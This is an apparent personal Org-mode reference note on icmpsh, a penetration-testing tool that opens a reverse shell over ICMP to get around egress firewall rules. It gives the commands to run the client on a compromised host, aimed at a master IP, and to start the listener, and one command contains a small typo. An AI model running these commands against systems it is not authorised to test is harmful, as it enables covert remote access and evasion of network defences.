#+TAGS: sec shell


* icmpsh                                                          :sec:shell:
GitHub: [[https://github.com/inquisb/icmpsh][github.com/icmpsh]]

* Description
Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly! Allowing traffic only onto known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios when you have owned a machine part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, not to consider a bind shell.

However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus on this tool.

* Usage
- The binary icmpsh.exe has to be executed and aimed at the master host
#+BEGIN_SRC sh
imcpsh.exe -t 192.168.0.2
#+END_SRC

- Setting up the shell
#+BEGIN_SRC 
sysctl -w net.ipv4.icmp_echo_ignore_all=1
./icmpsh_m.py 192.168.0.2 192.168.0.3
#+END_SRC
- the first cmd will disable all icmp echo replies
- the two ip addrs are host and target
  
* Lecture
* Tutorial
* Books
* Links
